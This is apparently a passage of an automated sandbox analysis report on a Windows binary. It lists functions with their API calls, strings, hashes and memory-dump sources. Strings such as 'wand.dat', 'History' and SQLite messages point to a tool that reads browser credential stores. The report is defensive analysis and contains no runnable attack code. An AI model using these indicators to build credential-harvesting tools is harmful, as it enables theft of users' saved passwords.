                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                  • String ID: \StringFileInfo\
                                                                                                                  • API String ID: 102104167-2245444037
                                                                                                                  • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                  • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                  Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                  Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                  • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem$PlacementWindow
                                                                                                                  • String ID: AE
                                                                                                                  • API String ID: 3548547718-685266089
                                                                                                                  • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                  • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                  • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                  • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                  Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _memicmpwcslen
                                                                                                                  • String ID: @@@@$History
                                                                                                                  • API String ID: 1872909662-685208920
                                                                                                                  • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                  • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                  Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                  • String ID: </%s>
                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                  • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                  • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                  Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                                                  • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendmemset
                                                                                                                  • String ID: AE$"
                                                                                                                  • API String ID: 568519121-1989281832
                                                                                                                  • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                  • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                  Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                  • String ID: caption
                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                  • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                  • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                  Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                  • String ID: MS Sans Serif
                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                  • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                  • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                  Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_wcsicmpmemset
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 2747424523-2167791130
                                                                                                                  • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                  • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                  Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                  • API String ID: 3150196962-1506664499
                                                                                                                  • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                  • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                  Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3384217055-0
                                                                                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                  Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 368790112-0
                                                                                                                  • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                  • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                  Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1889144086-0
                                                                                                                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                  Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1661045500-0
                                                                                                                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                  Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                  Strings
                                                                                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                  • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                  • API String ID: 1297977491-2063813899
                                                                                                                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                  Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                                  • API String ID: 2618321458-1828844352
                                                                                                                  • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                  • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                  Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                  • wcslen.MSVCRT ref: 00410C74
                                                                                                                  • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1549203181-0
                                                                                                                  • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                  • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                  Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
